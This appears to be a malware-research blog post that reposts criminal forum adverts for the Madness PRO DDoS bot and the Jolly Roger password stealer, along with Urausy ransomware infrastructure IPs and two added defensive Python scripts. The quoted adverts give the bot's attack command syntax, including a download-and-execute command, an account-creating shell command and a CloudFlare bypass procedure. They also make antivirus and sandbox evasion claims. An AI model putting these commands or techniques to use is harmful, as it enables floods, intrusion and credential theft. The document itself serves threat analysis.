- the packet header disables caching (Cache-Control: no-cache), which increases the load on the server.
- the bot-panel dialogue is protected with a special key


Detection:
when checking the build (without crypting or packing) only 3 antiviruses of all flagged it as suspicious (AVIRA, ClamAV, VBA32). In local tests the key AVs: Kaspersky, Nod32, DrWeb, Avast let the file through in 100% of cases.
link to the result: m.exe - Jotti antivirus scanner


Attack modes and commands
Since the system is professional, the command syntax is fairly complex, but only at first sight =) The command syntax is backward compatible with the Darkness system.

dd1 Main operating mode over HTTP with the GET method, using sockets. Supports ***cookies and $$$ref and allows up to 10 targets simultaneously (separator ";"). The fastest attack by number of requests. Example: dd1=http://ya.ru***cookies$$$referal;http://mail.ru***cookies2$$$referal2

dd2 Same mode as dd1, but with the POST method. A mandatory parameter @@@post_data is added. Also supports up to 10 targets. Example: dd2=http://forum.ru/index.php***cookies$$$referal@@@login=yyy&password =hhh, this command will post login yyy and password hhh to the script Zenon N.S.P. - paid website hosting, quality PHP, MySQL and Perl hosting. Choose shared hosting at affordable prices. A large choice of

dd3 HTTP GET attack using the system library WinInet.dll. Good old attack used in many Delphi bots. Slow because of the limitations of desktop Windows. Does not support referer and cookies, supports up to 10 targets. Example: dd3=http://host.com/script.php

dd4 HTTP POST attack using the system library WinInet. Same as dd3, but POST. Example:
dd4=http://host.com/script.php@@@@@@login=yyy&password=hhh

dd5 ICMP attack (pings). Up to 10 targets supported. Example dd5=198.168.0.1;199.0.0.1

dd6 UDP attack. Up to 10 targets supported. Mandatory parameters: port and text. Example: dd6=192.168.0.2:27015@@@flud_text

dd7 HTTP GET attack using the system library URMON.dll. Medium-speed attack, supports up to 10 targets and does not support cookies and referer

cfa command to bypass CloudFlare protection (!). Used ONLY while dd7 is running. Does not stop execution of the dd7 command. The idea is simple: the bot executes the JavaScript, obtains the needed cookie and CloudFlare considers the requests made by dd7 authorized. Example: dd7=http://site.ru/index.php, then (a minute and a half later) cfa=http://site.ru/index.php

cmd the command is executed in the cmd.exe command interpreter on the local machine. Does not stop execution of other commands. Example: cmd=net user goodwin /add

exe command to download and execute an EXE file. Does not stop execution of other commands. The file is saved under the same name it had on the internet. 3 attempts are made to download the file. Example: exe=http://site.com/filename.exe

Control panel:
We used a control panel from another product, modified by ~70% (purchased under a contract allowing modification and resale), rewriting it almost entirely since too many bugs were found and we didn't like the code. Naturally everything was fixed and optimized - you will like the new panel!

Screenshots:
:screenshot: Скриншот|Screenshot (login screen)
:screenshot: Скриншот|Screenshot (see english translation)


Demonstration:
Since the system is very powerful, only 15-20 bots are needed to demonstrate its capabilities, and those are always available - the sellers will try to demonstrate the power.

Prices:
- test license $0 (only for forum verifiers and testers; no updates provided)
- basic license $500 (update/rebuild $50, update to a new version $100, module prices will be set later)
- full license $950 (all updates, rebuilds and modules are free)

Discounts:
- 30% for owners of GBot/Andromeda/Dirt Dumper, of a basic iBot license, of a basic/silver Darkness license
- 50% for owners of gold and diamond Darkness/iBot licenses
- 20% extra for those who bought the above products no more than a week ago.

Payment
accepted: Yandex.Money, WMR/WMZ/WMB, PM and LR. Also any currency through an exchanger.

Guarantees:
Ready to work through the escrow service of any well-known forum.

Installments
For people with reputation and/or certificates an installment scheme is available. Discussed individually.

Contacts
- seller 1 ICQ: 902300
- seller 2 ICQ: 903400
- project lead ICQ: 395891570

Ready to undergo verification on the forum administration's terms.
------------------------------------------
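An analyst-side decoder for the command syntax described in the advert above, added here as an example (it is not code from the post nor from the bot's authors). It turns a command string captured from C&C traffic into target records so that hosts and URLs can be pulled out as indicators during incident response; the separators, command names and 10-target limit are as stated in the advert, and the sample commands are constructed after the advert's own examples.

```python
"""Decode Madness PRO command strings (dd1..dd7, cfa, cmd, exe) for IR triage.

Added example, not from the original post. Separators ("***" cookies,
"$$$" referer, "@@@" POST data, ";" between targets) follow the advert.
"""

# Command name -> attack mode, as listed in the advert.
MODES = {
    "dd1": "HTTP GET (sockets)",
    "dd2": "HTTP POST (sockets)",
    "dd3": "HTTP GET (WinInet)",
    "dd4": "HTTP POST (WinInet)",
    "dd5": "ICMP",
    "dd6": "UDP",
    "dd7": "HTTP GET (URLMON)",
    "cfa": "CloudFlare cookie fetch",
    "cmd": "local shell command",
    "exe": "download and execute",
}
MAX_TARGETS = 10  # the advert states up to 10 targets per command


def _split_http_target(spec):
    """Split 'url***cookies$$$referer@@@post_data' into its parts.

    Each separator is optional. The dd4 example in the advert writes the POST
    separator as six '@' characters, so surplus '@' are stripped from post_data.
    """
    post_data = None
    if "@@@" in spec:
        spec, post_data = spec.split("@@@", 1)
        post_data = post_data.lstrip("@")
    referer = None
    if "$$$" in spec:
        spec, referer = spec.split("$$$", 1)
    cookies = None
    if "***" in spec:
        spec, cookies = spec.split("***", 1)
    return {"url": spec, "cookies": cookies, "referer": referer, "post_data": post_data}


def parse_command(command):
    """Decode one 'name=args' command; raises ValueError on malformed input."""
    name, sep, args = command.strip().partition("=")
    name = name.lower()
    if not sep or name not in MODES:
        raise ValueError("unrecognised command: %r" % command)
    record = {"command": name, "mode": MODES[name], "targets": []}
    if name in ("cfa", "cmd", "exe"):
        # single argument: protected URL, shell line or payload URL
        record["targets"].append({"arg": args})
        return record
    specs = [s for s in args.split(";") if s]
    if not specs or len(specs) > MAX_TARGETS:
        raise ValueError("expected 1..%d targets, got %d" % (MAX_TARGETS, len(specs)))
    for spec in specs:
        if name == "dd5":
            record["targets"].append({"host": spec})
        elif name == "dd6":
            addr, _, payload = spec.partition("@@@")
            host, _, port = addr.rpartition(":")
            if not host or not port.isdigit():
                raise ValueError("dd6 target needs host:port, got %r" % spec)
            record["targets"].append({"host": host, "port": int(port), "payload": payload})
        else:
            record["targets"].append(_split_http_target(spec))
    return record


def extract_indicators(commands):
    """Collect every URL and host named in a batch of captured commands."""
    urls, hosts = set(), set()
    for command in commands:
        record = parse_command(command)
        for target in record["targets"]:
            if "url" in target:
                urls.add(target["url"])
            elif "host" in target:
                hosts.add(target["host"])
            elif record["command"] in ("exe", "cfa"):
                urls.add(target["arg"])   # cmd arguments are shell lines, not IOCs
    return {"urls": sorted(urls), "hosts": sorted(hosts)}


# Constructed sample batch; the syntax mirrors the advert's own examples.
SAMPLE_COMMANDS = [
    "dd1=http://ya.ru***cookies$$$referal;http://mail.ru***cookies2$$$referal2",
    "dd4=http://host.com/script.php@@@@@@login=yyy&password=hhh",
    "dd6=192.168.0.2:27015@@@flud_text",
    "dd5=198.168.0.1;199.0.0.1",
    "exe=http://site.com/filename.exe",
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        print(parse_command(cmd))
    print(extract_indicators(SAMPLE_COMMANDS))
```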
Translated by google as :
------------------------------------------
Madness PRO

Release Date: 01.09.2013

The history of creation :
In the summer of 2012 we started thinking about creating a fundamentally new DDoS - bot to test their own web resources on the fault-tolerance, since none of the systems tested did not deserve to even estimate "4".
The test samples during devoured memory load on the CPU local machine flew with errors, freezes on 50 % capacity CPU, making wrong entries in the registry , causing activation of protective systems , many weighty error was found in the control panels .
To create our own system, we studied in detail: BlackEnergy (source code), gbot (disassembling), DirtJumper (disassembling), Darkness Optima (source code, purchased under contract), iBot (source code, purchased under contract), w3Bot (source); the source code of Zeus and of many programs from adjacent scenes was also studied.

capabilities
- Written in C + +, easily crypt is lightweight (compressed sample < 15KB )
- Full compatibility with all Windows family of NT (x86 and x64)
- Bot has 7 types of attacks
- Stability in the system. Indicators load on the CPU and RAM are very uniform .
- Do not attracted the attention of UAC and Windows Firewall
- Able to establish port, referal and cookies individually for each goal
- Supports up to 10 targets simultaneously
- Has a very low load on the CPU with the new , complex system of parsing commands ( all analogs parsing takes place inside a function in multiple threads - it's extra work load on the processor . New bot enters all data in the array before the attack on the function and come ready options address, port , referral , etc.)
- Has an enormous power output of more than 1500 http ( and more 30000 UDP) queries per minute through direct interaction with the network drivers , even on desktop Windows! (only using WinSock) is about 10 times more than some few analogs and more top ( on this parameter ) competitors.
- In the control panel are : the number of requests per minute , right in the system , the version of the system.
- Supports bypass CloudFlare protection ( !) And many other more common .
- Supports Slow GET and Slow POST modes !
- In the packet header specifies disabling the cache (Cache-Control: no-cache), which increases the load on the server .
- The bot-panel dialogue is protected with a special key


Detection:
checking build (without crypt and packaging ), only 3 out of all the anti-virus gave a suspicion (AVIRA, ClamAV, VBA32). During the test key local AV : Kaspersky, Nod32, DrWeb, Avast missed a file in 100 % of cases.
Link Result : m.exe - Virus scanner Jotti


Modes of attack and the team
Since the system is professional, the command syntax is rather complex, but only at first sight =) The command syntax is backward compatible with the Darkness system.

dd1 basic mode of operation via HTTP protocol using GET, using sockets. Supports ***cookies and $$$ref and allows for up to 10 targets simultaneously (separated by ";"). The fastest attack by request volume. Example: dd1=http://ya.ru***cookies$$$referal;http://mail.ru***cookies2$$$referal2

dd2 same treatment as dd1, only the method POST. Added optional parameter @ @ @ post_data. It is also support for up to 10 targets. Example : dd2 = http://forum.ru/index.php *** cookies $ $ $ referal @ @ @ login = yyy & password = hhh, this team posted a username and password yyy hhh on the script Zenon NSP - Paid web hosting , quality hosting PHP, MySQL and Perl. Choose a shared hosting at affordable prices. Great choice that

dd3 attack on the HTTP GET method using a system library WinInet.dll. Good old attack that is used in many Delphi bots . Slow due to the limitations of desktop Windows. Does not support the referral and cookies , supports up to 10 targets . Example : dd3 = http://host.com/script.php

dd4 attack via HTTP POST method using the system library WinInet. Same as dd3, only POST. Example:
dd4 = http://host.com/script.php @ @ @ @ @ @ login = yyy & password = hhh

dd5 ICMP attack ( pings ) . Supports up to 10 targets . Example dd5 = 198.168.0.1; 199.0.0.1

dd6 UDP attack . Supports up to 10 targets . Required parameters : port , and text. Example : dd6 = 192.168.0.2:27015 @ @ @ flud_text

dd7 attack on the HTTP GET method using a system library URMON.dll average speed attack that supports up to 10 targets and do not support cookies and referal

cfa command to bypass the protection CloudFlare (!). ONLY used during dd7. Does not stop the dd7 command. The point is simple - the bot executes java script gets the desired cookie and believes CloudFlare requests made ​​by authorized dd7 . Example : dd7 = http://site.ru/index.php, then (after fifteen minutes ) cfa = http://site.ru/index.php

cmd command is executed on the command interpreter cmd.exe on the local machine . Does not stop the execution of other commands. Example : cmd = net user goodwin / add

exe command to load and run the EXE file. Does not stop the execution of other commands. The file is saved under the same name, under which he had been on the internet. Made three attempts to download the file . Example : exe = http://site.com/filename.exe

Control Panel :
We used a modified ~ 70 % PU from another set (purchased under a contract for change and resale ) by rewriting it almost completely, as it was found too many mistakes and did not like the code . Of course everything was corrected and optimized - New PU Enjoy !

Screenshots:
: screenshot: Screenshot | Screenshot (login screen)
: screenshot: Screenshot | Screenshot


Demo:
So, as the system is very powerful , and to demonstrate the need to only 15-20 bots that are always available - Sellers will try to demonstrate the power .

prices:
- Test License $ 0 ( only for checking the forums and testers. Updates are not provided )
- Basic License $ 500 (upgrade / Rebuild $ 50 upgrade to the new version $ 100 , the price of modules will be installed later)
- $ 950 full license ( all upgrades, rebuilds and modules are free)

discounts:
- 30% for the owners GBot / Andromeda / Dirt Dumper, basic license iBot, base / silver license Darkness
- 50 % for holders of gold and diamond license Darkness / iBot
- 20 % extra for those who acquired the products listed above are not more than a week ago.

payment
to accept POISON , WMR / WMZ / WMB, PM and LR. And as any currency through an exchanger.

Warranties :
Willingness to work through the guarantor of any known forum.

installment plan
In order to have a reputation and / or certificates of a system for people installments. Discussed individually.

Contacts
- Celler 1 ICQ: 902300
- Celler 2 ICQ: 903400
- Project Manager ICQ: 395891570

Ready to be tested under the administration of the forum.
------------------------------------------

Then he replied about  CloudFlare protection :

------------------------------------------
Bypassing CloudFlare protection.

The CloudFlare protection suite is based on identifying the browser by executing a JavaScript in it, after which the client is issued a unique cookie.
A bot, like a browser, can in theory execute JavaScript. The enormous difficulty is fitting the required volume of mathematical functions into the modest size of the bot build, but some specimens do cope with the task!
Let's consider an example of testing the server http://server.com, protected by CloudFlare, with the C++ Madness 1.08 suite:
1) The botnet is given the command dd7=http://server.com, after which requests to the server begin via the system library UrlMon. As can be seen from the server logs and the sniffer, the bots get back a 302 error, which means the protection is working.

2) The botnet is given the command cga=http://server.com and the bots request cookies for authorization. Having executed the JavaScript, each bot receives a unique (for its IP and user agent) cookie, which it immediately includes in the packet header. The logs show that requests to the server go through normally and the returned content matches the content of the website on it!

Q) Why can't this be done automatically?
A) Depending on the protection settings, the cookie may change at an arbitrary interval and authorization has to be passed again. For now automation does not cope with this the way a professional human does. Too frequent a check interval badly degrades the site's usability, since ordinary users see the CloudFlare "swing" every single second.

Q) Can this method be used constantly, for any purpose?
A) It can, but it is not recommended, since dd7 is by itself a slower attack compared with dd1, and here the load increases further because of assembling the special protection-bypass packet.



Project news

From today one more seller from the sales department works with us: iSupport (709186)



ICQ: 902300, 903400, 709186
JAB: damrai13@jabber.ru
------------------------------------------
Translated by google as :
------------------------------------------
Protection bypass CloudFlare.

CloudFlare security complex is based on the determination of the browser by running Java script in it , after which the client is issued a unique cookies.
Both, like the browser can theoretically run Java Script . The great difficulty is to fit the required amount of mathematical functions in the modest size of the build bot , however, some instances of coping with the task !
Consider the example of a test server http://server.com, protected by CloudFlare complex + + Madness 1.08:
1) A botnet command is given dd7 = http://server.com, then start rekvest to the server using the system library UrlMon. As can be seen on the server logs and sniffer , 302 bots error is returned , which means job security .

2) A botnet command is given cga = http://server.com cookies and bots request for authorization. Java script executing each bot has a unique (for its ip and useragent) cookie which immediately includes the packet header . According to the logs can be seen that the requests to the server are in normal mode and returns the content of the website corresponds to the content on it!

Q) Why can not I do it automatically?
A) Depending on the security settings, cookie can be changed in an arbitrary interval and authorization need to go again . So far, the automation can not cope with it as it makes a person a professional . Too frequent inspection interval greatly reduces the usability of the site , as ordinary users see every single swing CloudFlare seconds.

Q) Can I use this method all the time, for any purpose ?
A) It is possible, but not recommended. Since dd7 itself is a slow attack , compared with dd1, and then there's the load is increased due to the preparation of the special package to bypass the protection .

News of the project
From today, we are working with another Celler Sales: iSupport (709186)

ICQ: 902300, 903400, 709186
JAB: damrai13@jabber.ru
------------------------------------------
Madness C&C
Botnet Operator testing his baby.

Thanks to Arbor Networks ASERT Threat Intelligence for additional info.
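The advert above sells the flood on two numbers: 1500+ GET requests per minute per bot, and a "Cache-Control: no-cache" header on every request so nothing is served from cache. Those two traits are exactly what a defender can key on in a web server's access log. The following Python is an added example, not code from the blog post or from the Madness advert; the log format, the sample lines and the per-minute threshold are all constructed assumptions that would need tuning to a real site.

```python
"""Flag HTTP flood sources in a web server access log.

Added example (not from the blog post or the Madness advert). The profile
it looks for is the one the advert describes: a single source that pushes
hundreds of requests inside one minute and marks (almost) all of them
"Cache-Control: no-cache". The log format and threshold are assumptions.
"""
from collections import defaultdict
import re

# Constructed log format: "HH:MM:SS client_ip METHOD path status "cache-control""
LINE_RE = re.compile(
    r'^(?P<ts>\d{2}:\d{2}:\d{2}) (?P<ip>\S+) (?P<method>GET|POST) (?P<path>\S+) '
    r'(?P<status>\d{3}) "(?P<cc>[^"]*)"$'
)


def parse(line):
    """Return a dict of fields for a well-formed line, else None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def flood_sources(lines, per_minute=300, min_nocache_ratio=0.9):
    """Return {ip: (peak_requests_in_one_minute, no_cache_ratio)} for sources
    whose busiest minute exceeds per_minute AND whose requests are almost
    all cache-busting. A busy but cache-friendly crawler is not reported."""
    per_ip_minute = defaultdict(lambda: defaultdict(int))  # ip -> minute -> count
    nocache = defaultdict(int)
    total = defaultdict(int)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue  # skip unparseable lines rather than crash on them
        minute = rec["ts"][:5]  # HH:MM bucket
        per_ip_minute[rec["ip"]][minute] += 1
        total[rec["ip"]] += 1
        if "no-cache" in rec["cc"].lower():
            nocache[rec["ip"]] += 1
    flagged = {}
    for ip, buckets in per_ip_minute.items():
        peak = max(buckets.values())
        ratio = nocache[ip] / total[ip]
        if peak > per_minute and ratio >= min_nocache_ratio:
            flagged[ip] = (peak, round(ratio, 2))
    return flagged


def sample_log():
    """Constructed access log: one flood source, a little normal traffic,
    and a busy crawler that honours caching (should NOT be flagged)."""
    lines = []
    for i in range(400):  # flood: 400 no-cache GETs inside minute 12:00
        lines.append(f'12:00:{i % 60:02d} 203.0.113.7 GET /index.php?x={i} 200 "no-cache"')
    for i in range(5):  # ordinary visitors, one request each
        lines.append(f'12:00:{i:02d} 198.51.100.{i} GET /about 200 ""')
    for i in range(350):  # crawler: many requests, but cache-friendly headers
        lines.append(f'12:01:{i % 60:02d} 192.0.2.9 GET /p/{i} 200 "max-age=0"')
    return lines


if __name__ == "__main__":
    for ip, (peak, ratio) in flood_sources(sample_log()).items():
        print(f"{ip}: {peak} req/min at peak, no-cache ratio {ratio}")
```

Only the constructed source 203.0.113.7 is reported; the crawler exceeds the rate but fails the no-cache test, which is the point of combining the two signals rather than alerting on rate alone.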

Urausy is going Regional in United States


As long as there will be people paying...I guess we'll have news to write about Ransomware.
Today I faced a new Design for Urausy in United States...Was wondering what was making it new.

See :

Urausy -  Piece of Design US-NC - 2013-10
 for Victims from North Carolina
2013-10-15

Urausy designs, which used to be country specific, are now moving down to the state level.
One more :

Urausy - US-HI - 2013-10-15
Hawaii 
If for some reason, the server can't determine the region, then you'll be granted the "old" Urausy Design as Failover :

Urausy US-Region Failover 2013-10-15
(was previous global US design)

Many States in one Picture :

State targeted Urausy for US in one Image
(too small ? full size here : http://i.minus.com/iK8bXuvUSnOkY.png (8Mb) )

Infra :
I can see 120 IPs that can serve indifferently as Kore Exploit Kit or as Urausy C&C (there are obviously more: some in the same ranges not yet activated, and others in ranges unknown to me).

184.82.177.22
41390 | 195.3.144.0/22 | RN-DATA | LV | ALTNET.LV | RN DATA SIA

195.3.147.17
41390 | 195.3.144.0/22 | RN-DATA | LV | ALTNET.LV | RN DATA SIA

46.161.27.166 up to 254
44050 | 46.161.27.0/24 | PIN | RU | PINSPB.RU | PETERSBURG INTERNET NETWORK LTD.

46.4.179.110
46.4.18.152
46.4.199.234
46.4.199.244
46.4.238.17 up to  30
24940 | 46.4.0.0/16 | HETZNER | DE | YOUR-SERVER.DE | VPSSERVER

93.189.44.145
41853 | 93.189.44.0/22 | NTCOM | RU | NT-COM.RU | LIMITED LIABILITY COMPANY NTCOM

94.242.206.252
94.242.206.32
94.242.206.37
94.242.206.61
94.242.206.73 up to 76
94.242.206.79
94.242.206.83
94.242.206.96
5577 | 94.242.192.0/18 | ROOT | LU | ROOT.LU | ROOT SA

By the way OT,  here is a German Design which is new to me (but long time since i last checked) :

New (to me) variant for
Urausy DE 2013-10


Files : Here (OwnCloud via goo.gl) (all the designs I was able to gather :
Arizona, California, Georgia, Hawaii, Illinois, Indiana, Maryland, Nevada, New Jersey, New York, North Carolina, Ohio, Pennsylvania, Texas, Utah, Washington )

Read More :
The missing link - Some lights on "Urausy" affiliate - 2013-05-29 <--  if you want to know more on what is behind.

Urausy Ransomware - July 2013 Design Refresh - "Summer 2013 Collection" 2013-07-28
Urausy Lockscreen: Your computer will remain locked for 3 days, 11 hours and 20 minutes! - 2013-07-24 - Jaromir Horejsi - Avast
Urausy Ransomware - Arab world targeted 2013-04-06

Jolly Roger Stealer - Stoberox.B(?)/Zlader.F


Piece of Jolly Roger Stealer Advert


Original Text of the Advert
------------------------------------------
Jolly Roger Stealer - updated password collection system, password stealer with loader functionality

Good day, dear black-hat community!

I offer for your attention the password collection system "Jolly Roger Stealer".
The system is a silent non-resident piece of software that steals the user's passwords for various resources and sends them to the server.

Technical characteristics:

- Small size (weight ~37 KB uncrypted and unpacked)

- Does not drop any DLLs/files; no third-party libraries, files etc. are used

- Stable operation on Windows XP/2003/Vista/7/8 (x32/x64)

- Works under any account (UAC on/off; admin/user/guest)

- No alerts from UAC (Vista/7) or the system security service

- Dynamic import of part of the API functions by hashes of their names

- Some semblance of anti-emulation (as far as is possible in Ring3)

- Anti-debugging (detection of active ring3 debugging)

- Contains no static text strings (data is generated at run time)

- Encryption of transmitted data

- Compatible with any cryptors/packers/protectors
(no third-party libraries, files etc. are used; a standard EXE file without TLS, EOF, etc.)

- Detection of the presence of sandboxes and some proactive protections
(when they are detected the bot stops executing and safely deletes itself)

Detected sandboxes:

+ JoeBox (3 variants)
+ SandboxIE
+ SunBelt (3 variants)
+ ThreadExpert (2 variants)
+ Sandbox (1,2)
+ Norman SandBox
+ Anubis (2 variants)
+ CWSandbox

Detected virtual machines:

+ Virtual PC
+ VirtualBox
+ VMware
+ Parallels Workstation
+ QEMU

Detected sniffers:

+ Wireshark

Detected Ring3 / Ring0 debuggers:
+ OllyDBG
+ Immunity Debugger
+ WinDbg
+ W32DAsm
+ IDA
+ SoftICE
+ Syser
+ TRW
+ TWX

- Bypass of firewalls and proactive protections by injecting the payload into a trusted process (default settings)

Tests were carried out on the following products with the latest updates:

AVG Internet Security 2012 - bypasses
Avira Premium Security Suite 10.0.0.608 - bypasses
BitDefender Internet Security 2012 - bypasses
F-Secure Internet Security 2011 - bypasses
Jetico Personal Firewall 2010 - bypasses
Norton Internet Security 2012 - bypasses
Sunbelt Personal Firewall 4.6.1861.0 - bypasses
G Data InternetSecurity 2012 - bypasses
Trend Micro Titanium Internet Security 2012 - bypasses
Dr.Web Security Space Pro 7 - bypasses
ESET NOD32 Smart Security 5 - bypasses
Panda Internet Security 2012 - bypasses
Malware Defender 2.7.3.0002 - bypasses
Kaspersky Internet Security 2012 - bypasses

In some cases a good crypt is required! (example: KIS 2012)

- Detection of problematic protection products which this code is categorically unable to
bypass, and self-deletion in case they are detected

- Support for retrieving and decrypting passwords from the following programs (current latest versions):
+ FAR Manager
+ Total Commander
+ WS_FTP
+ CuteFTP
+ FlashFXP
+ FileZilla
+ FTP Commander
+ BulletProof FTP
+ SmartFTP
+ TurboFTP
+ FFFTP
+ CoffeeCup FTP
+ CoreFTP
+ FTP Explorer
+ Frigate3 FTP
+ SecureFX
+ UltraFXP
+ FTPRush
+ WebSitePublisher
+ BitKinex
+ ExpanDrive
+ ClassicFTP
+ Fling
+ SoftX
+ Directory Opus
+ FreeFTP
+ DirectFTP
+ LeapFTP
+ WinSCP
+ 32bit FTP
+ NetDrive
+ WebDrive
+ FTP Control
+ Opera
+ WiseFTP
+ FTP Voyager
+ Firefox
+ FireFTP
+ SeaMonkey
+ Flock
+ Mozilla Suite Browser
+ LeechFTP
+ Odin Secure FTP Expert
+ WinFTP
+ FTP Surfer
+ FTPGetter
+ ALFTP
+ Internet Explorer
+ Dreamweaver
+ DeluxeFTP
+ Google Chrome
+ Chromium
+ SRWare Iron
+ ChromePlus
+ Bromium
+ Nichrome
+ Comodo Dragon
+ RockMelt
+ K-Meleon
+ Epic
+ Staff-FTP
+ AceFTP
+ Global Downloader
+ FreshFTP
+ BlazeFTP
+ NETFile
+ GoFTP
+ 3D-FTP
+ Easy FTP
+ Xftp
+ FTP Now
+ Robo-FTP
+ LinasFTP
+ Cyberduck
+ Putty
+ Notepad++ (NppFTP)
+ CoffeeCup Visual Site Designer
+ CoffeeCup Sitemapper
+ FTPShell
+ FTPInfo
+ NexusFile
+ FastStone Browser
+ CoolNovo
+ WinZip
+ Yandex.Internet
+ MyFTP
+ sherrod FTP
+ NovaFTP
+ Windows Mail
+ Windows Live Mail
+ Pocomail
+ Becky!
+ IncrediMail
+ The Bat!
+ Outlook
+ Thunderbird
+ FastTrackFTP

Screenshots:
http://i019.radikal.ru/1308/91/598ac0e5c9b4.png
http://s019.radikal.ru/i601/1308/42/0213cf6c75a8.png
[redacted - thx Denis]

(update of 03.10.13)

Loader functionality is also present:

+ Unlimited number of file download tasks
+ File size is not limited
+ Ability to split tasks by country, and to set a download limit
+ If the downloaded file fails to launch, it is deleted
+ The file is checked for a PE header before launch (only executables are started)
+ Convenient task management and statistics in the admin panel
+ All task and report data is subjected to 2-level encryption in both directions (admin panel <-> bot)

http://s020.radikal.ru/i713/1310/de/752434b61d42.png
http://i016.radikal.ru/1310/59/5125d395c417.png

+ A parser for selecting the needed accounts has been added to the admin panel

http://s020.radikal.ru/i717/1310/21/20c97535bd51.png


Price: build = 500$
rebuild = 30$

ONLY PERFECTMONEY!

Contacts: jr@exploit.im
------------------------------------------
Translated by google as:
------------------------------------------
Jolly Roger Stealer - updated collection system pas Steeler passes with a functional loader

Good day, dear black-hat community!

I offer you a system to collect passwords "Jolly Roger Stealer".
The system is a quiet resident software that steals user passwords from a variety of resources and sending them to the server .

Specifications:

- Small size (weight ~ 37 kb nekriptovanny and nepakovanny )

- Do not throw yourself out of any DLL / file does not use third-party libraries , files, and so on.

- Stable work in Windows XP/2003/Vista/7/8 (x32/x64)

- Work in any account (UAC - on / off; admin / user / guest)

- No alerts from UAC (Vista / 7) and the security of the system

- Dynamic imports of API functions for hashes of their names

- A sort of anti-emulation techniques (as far as possible in the Ring3)

- Anti debugging (finding active ring3 debugging)

- Does not contain static text strings (the data generated in the half - rial )

- Encryption of data transmitted

- Compatible with any kriptore / packers / protectors
( do not use third-party libraries , files, and so on. standard EXE file without TLS, EOF, etc.)

- Detect the presence Sandbox'ov and some proactive protection
( if they are detected bot stops its execution and safely deletes itself )

Detectable SandBox'y :

+ JoeBox ( 3 variants)
+ SandboxIE
+ SunBelt ( 3 variants)
+ ThreadExpert ( 2 variants)
+ Sandbox (1,2)
+ Norman SandBox
+ Anubis ( 2 variants)
+ CWSandbox

Detectable virtual machines :

+ Virtual PC
+ VirtualBox
+ VMware
+ Parallels Workstation
+ QEMU

Detectable sniffers :

+ Wireshark

Detectable Ring3 / Ring0 debuggers :
+ OllyDBG
+ Immunity Debugger
+ WinDbg
+ W32DAsm
+ IDA
+ SoftICE
+ Syser
+ TRW
+ TWX

- Bypass firewalls and proactive protection by inzhekta Payload'a into a trusted process ( the default setting )

Tests were carried out on the following products with the latest updates :

AVG Internet Security 2012 - bypasses
Avira Premium Security Suite 10.0.0.608 - bypasses
BitDefender Internet Security 2012 - bypasses
F-Secure Internet Security 2011 - bypasses
Jetico Personal Firewall 2010 - bypasses
Norton Internet Security 2012 - bypasses
Sunbelt Personal Firewall 4.6.1861.0 - bypasses
G Data InternetSecurity 2012 - bypasses
Trend Micro Titanium Internet Security 2012 - bypasses
Dr.Web Security Space Pro 7 - bypasses
ESET NOD32 Smart Security 5 - bypasses
Panda Internet Security 2012 - bypasses
Malware Defender 2.7.3.0002 - bypasses
Kaspersky Internet Security 2012 - bypasses

In some cases, a good crypt ! (Example - KIS 2012)

- Detect the problem of security products that this code can not categorically
oboyti samoudalenie and when found

- Support for receiving and decrypting passwords of the following programs ( current latest version ) :
+ FAR Manager
+ Total Commander
+ WS_FTP
+ CuteFTP
+ FlashFXP
+ FileZilla
+ FTP Commander
+ BulletProof FTP
+ SmartFTP
+ TurboFTP
+ FFFTP
+ CoffeeCup FTP
+ CoreFTP
+ FTP Explorer
+ Frigate3 FTP
+ SecureFX
+ UltraFXP
+ FTPRush
+ WebSitePublisher
+ BitKinex
+ ExpanDrive
+ ClassicFTP
+ Fling
+ SoftX
+ Directory Opus
+ FreeFTP
+ DirectFTP
+ LeapFTP
+ WinSCP
+ 32bit FTP
+ NetDrive
+ WebDrive
+ FTP Control
+ Opera
+ WiseFTP
+ FTP Voyager
+ Firefox
+ FireFTP
+ SeaMonkey
+ Flock
+ Mozilla Suite Browser
+ LeechFTP
+ Odin Secure FTP Expert
+ WinFTP
+ FTP Surfer
+ FTPGetter
+ ALFTP
+ Internet Explorer
+ Dreamweaver
+ DeluxeFTP
+ Google Chrome
+ Chromium
+ SRWare Iron
+ ChromePlus
+ Bromium
+ Nichrome
+ Comodo Dragon
+ RockMelt
+ K-Meleon
+ Epic
+ Staff-FTP
+ AceFTP
+ Global Downloader
+ FreshFTP
+ BlazeFTP
+ NETFile
+ GoFTP
+ 3D-FTP
+ Easy FTP
+ Xftp
+ FTP Now
+ Robo-FTP
+ LinasFTP
+ Cyberduck
+ Putty
+ Notepad + + (NppFTP)
+ CoffeeCup Visual Site Designer
+ CoffeeCup Sitemapper
+ FTPShell
+ FTPInfo
+ NexusFile
+ FastStone Browser
+ CoolNovo
+ WinZip
+ Yandex.Internet
+ MyFTP
+ Sherrod FTP
+ NovaFTP
+ Windows Mail
+ Windows Live Mail
+ Pocomail
+ Becky!
+ IncrediMail
+ The Bat!
+ Outlook
+ Thunderbird
+ FastTrackFTP

Screenshots:
http://i019.radikal.ru/1308/91/598ac0e5c9b4.png
http://s019.radikal.ru/i601/1308/42/0213cf6c75a8.png

( update on 3/10/13 )

Also there is a functional loader :

+ Unlimited number of tasks to download the file
+ File size is unlimited
+ Possibility to divide tasks across countries, as well as an indication limit of downloads
+ In case of an unsuccessful launch the downloaded file, it will be removed
+ Check the file to PE before starting ( we start only executables )
+ Easy task management and statistics in the admin panel
+ All data on assignments and report are 2- tier encryption in both directions ( admin page <- > bot )

http://s020.radikal.ru/i713/1310/de/752434b61d42.png
http://i016.radikal.ru/1310/59/5125d395c417.png
[redacted - thx Denis]

+ Parser added to the admin panel to select the desired akkov

http://s020.radikal.ru/i717/1310/21/20c97535bd51.png


Price : build = $ 500
Rebuild = $ 30

ONLY PERFECTMONEY!

Contact : jr@exploit.im
------------------------------------------

Note price has moved to :
build = 350$
rebuild = 15$
on 2013-10-17


It seems Microsoft names the sample associated with this panel Stoberox.B (but I wonder if it's related to other samples named Stoberox by Microsoft).
Eset names it Zlader.F.

Login Screen :

Stoberox C&C - Login Screen


Here is how it looks inside :

Stoberox C&C - Bots Statistic

Stoberox C&C - Logs
Email Lists
Stoberox C&C - Logs Search


Stoberox C&C - Create Tasks

Storebox - Tasks Statistic




"pony + spyeye admin panel ? " - GrandSoft

<edit 2hours after post: Fixed typo : Zlader != Zlater />

Sample: Here (OwnCloud)

C&C call:
81.177.141.211
